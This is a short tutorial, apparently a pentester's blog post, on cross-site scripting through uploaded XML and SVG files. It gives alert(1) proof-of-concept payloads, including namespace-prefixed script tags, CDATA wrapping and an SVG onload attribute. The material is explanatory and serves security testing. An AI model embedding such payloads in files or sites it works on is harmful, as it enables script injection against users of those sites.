[XSS] file-based attacks

Created on: 2019-06-24 Click here to download a RAW version of this article (Markdown Format)
Back to Index

Thanks to: @pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc
Follow me on https://twitter.com/si9int to stay updated!

1. XML

JavaScript can be embedded inside a XML file which then (after being uploaded) might trigger the payload while being rendered.
Example

<html>
<head></head>
<body>
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

xmlns is the XML name-space, something the prefix for the name-space (to avoid name conflicts with other XML fragments).
If we don't want to treat our JavaScript payload as XML we can use the CDATA section:

<name>
    <value><![CDATA[<script>alert(1)</script>]]></value>
</name>

CDATA stands for "Character Data" and means that included data (inside the tag) could but should not be interpreted as XML.
CDATA is part of the XML document, while a comment is not.

2. SVG

Since .svg is an XML-based vector image format, we can also embed JavaScript into SVG files using a \<script> tag like in HTML.
Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">alert(1);</script>
</svg>

\<polygon> creates a graphic which contains at least three sides (0,0; 0,50; 50,0).
There are much shorter payloads for .svg files, including only the JavaScript part. Example (executes when SVG image renders):

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">

Again we can use the CDATA for embedding our payload "silently":

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></script>
<desc> = isn't rendered part of the graphic and provides a description of any SVG element

Thanks to:
@pentest_swissky, @signalchaos, @itsecurityguard, @mickeyc